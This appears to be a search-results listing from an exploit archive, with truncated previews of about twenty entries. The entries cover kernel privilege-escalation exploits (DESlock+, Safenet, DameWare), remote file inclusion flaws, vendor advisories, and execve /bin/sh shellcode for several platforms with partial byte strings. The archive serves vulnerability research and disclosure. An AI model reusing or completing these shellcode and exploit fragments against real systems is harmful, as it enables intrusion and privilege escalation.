132 matches found
DESlock+ 3.2.6 - DLMFDISK.sys Local kernel Ring0 SYSTEM
DESlock+ 3.2.6 - DLMFDISK.sys Local kernel Ring0 SYSTEM / deslock-pown-v2.c Copyright c 2008 by DESlock+ include include include define DLKFDISKIOCTL 0x80002024 define DLKFDISKRIOCTL 0x80002010 define DLKFDISKSLOT 0x00000C5A define DLKFDISKOFFSET 0x0D define DLKFDISKDISKMAX 0x1A static unsigned...
DESlock+ 3.2.6 - Local Kernel Ring0 link list zero SYSTEM
DESlock+ 3.2.6 - Local Kernel Ring0 link list zero SYSTEM / deslock-list-zero-v2.c Copyright c 2008 by DESlock+ include include include define DLMFENCIOCTL 0x0FA4204C define DLMFENCFLAG 0xC001D00D define DLKFDISKRIOCTL 0x80002008 define DLKFDISKSLOT 0x00000C5C define ARGSIZEa a/sizeof void static...
Safenet IPSecDrv.sys <= 10.4.0.12 Local kernel ring0 SYSTEM Exploit
Exploit for unknown platform in category local exploits =================================================================== Safenet IPSecDrv.sys Safenet IPSecDrv.sys include include include define IPSECDRVIOCTL 0x80002064 define ARGSIZEa a/sizeof void static unsigned char win32fixup = "\x...
anp-multi.txt
Discovered by hack2prison and navaro - VNBRAIN.NET member Vendor: Alstrasoft http://site/path/admin/backupstart.php http://site/path/admin/admin/dump/backup-dd-mm-yyyy.sql http://site/path/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql...
Web News 1.1 - 'news.php?config[root_ordner]' Remote File Inclusion
source: https://www.securityfocus.com/bid/25257/info WebNews is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks...
@cid Stats 2.3 - Install.php3 Remote File Inclusion
@cid Stats 2.3 - Install.php3 Remote File Inclusion source: https://www.securityfocus.com/bid/20925/info The '@cid stats' program is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise...
sco/x86 execve("/bin/sh", ..., NULL); 43 bytes
Exploit for sco/x86 platform in category shellcode ============================================== sco/x86 execve("/bin/sh", ..., NULL); 43 bytes ============================================== / minervini at neuralnoise dot com c 2005 SCOSV scosysv 3.2 5.0.7 i386, execve("/bin/sh", ..., NULL); / inclu...
Active WebCam Webserver <= 5.5 Multiple Vulnerabilities (DoS, Path Disc)
The version of PY Software's Active WebCam web server running on the remote host is affected by multiple vulnerabilities: o Denial of Service Vulnerabilities. A request for a file on floppy drive may result in a dialog prompt, causing the service to cease until it is acknowledged by an...
Winace UnAce 1.x - ACE Archive Directory Traversal
Winace UnAce 1.x - ACE Archive Directory Traversal source: https://www.securityfocus.com/bid/12628/info A remotely exploitable client-side directory-traversal vulnerability affects Winace unace. The application fails to properly sanitize file and directory names contained within malicious ACE...
[SA13443] OpenBSD isakmpd Denial of Service Vulnerability
TITLE: OpenBSD isakmpd Denial of Service Vulnerability SECUNIA ADVISORY ID: SA13443 VERIFY ADVISORY: http://secunia.com/advisories/13443/ CRITICAL: Not critical IMPACT: DoS WHERE: Local system OPERATING SYSTEM: OpenBSD 3.x http://secunia.com/product/100/ DESCRIPTION: A vulnerability has been...
Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service
Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service source: https://www.securityfocus.com/bid/11859/info It is reported that the Kerio Personal Firewall KPF driver does not sufficiently sanitize API parameters that are received from APIs that are hooked by KPF. When the KPF API hook handl...
linux/x86 execve /bin/sh alphanumeric 392 bytes
linux/x86 execve /bin/sh alphanumeric 392 bytes. Shellcode exploit for linx86 platform / Linux/x86 execve of /bin/sh you can put 0-200 nops before shellcode nop = 0x47 = 'G' / char shellc = // nops here .. "LLLLXPY3E01E01u03u0fXh8eshXf5VJPfhbifhDefXf5AJfPDTYhKATYX5KATY"...
os-x/PPC setuid0 + execve /bin/sh 88 bytes
os-x/PPC setuid0 + execve /bin/sh 88 bytes. Shellcode exploit for osxppc platform / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does setuid0; execve/bin/sh; exit0; See ASM below. 88 Bytes. / char shellcode = "\x7c\x63\x1a\x79\x40\x82\xff\xfd" "\x7d\x68\x02\xa6\x3b\xeb\x01\x70"...
freebsd/x86 - kldload /tmp/o.o 74 bytes
freebsd/x86 kldload /tmp/o.o 74 bytes. Shellcode exploit for freebsdx86 platform / The kldload shellcode setuid0 loads /tmp/o.o kernel module Size 74 bytes OS FreeBSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor eax,eax mov al,0x17 push eax in...
Mac OS X < 10.3.4 Multiple Vulnerabilities
The remote host is running a version of Mac OS X that is older than 10.3.4. Such versions contain several flaws that may allow an attacker to execute arbitrary commands on the remote system with root privileges. C Tenable Network Security, Inc. include"compat.inc"; ifdescription scriptid12257;...
KAME Racoon - 'Initial Contact' SA Deletion
// source: https://www.securityfocus.com/bid/9417/info It has been reported that it may be possible for attackers to remotely delete security associations SAs in hosts running the KAME IKE daemon Racoon. / Sun Microsystems Solaris sysinfo Kernel Memory Disclosure exploit...
Microsoft Internet Explorer 5/6 - Object Type Validation
Microsoft Internet Explorer 5/6 - Object Type Validation source: https://www.securityfocus.com/bid/8456/info The problem occurs when Internet Explorer receives a response from the server when a web page containing an object tag is parsed. Successful exploitation of this vulnerability could allow a...
[CLA-2003:723] Conectiva Security Announcement - openslp
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- CONECTIVA LINUX SECURITY ANNOUNCEMENT - -------------------------------------------------------------------------- PACKAGE : openslp SUMMARY : Temporary file creation...
DameWare Mini Remote Control Server - System
DameWare Mini Remote Control Server - System / DameWare Mini Remote Control Server Local SYSTEM Exploit Vulnerable Versions Prior to 3.71.0.0 by [email protected] This code is based on shards.cpp by xenophile / define WIN32LEANANDMEAN include include pragma warningdisable: 4305 pragma...
DameWare Mini Remote Control Server SYSTEM Exploit
Exploit for unknown platform in category local exploits ================================================== DameWare Mini Remote Control Server SYSTEM Exploit ================================================== / DameWare Mini Remote Control Server Local SYSTEM Exploit Vulnerable Versions Prior to...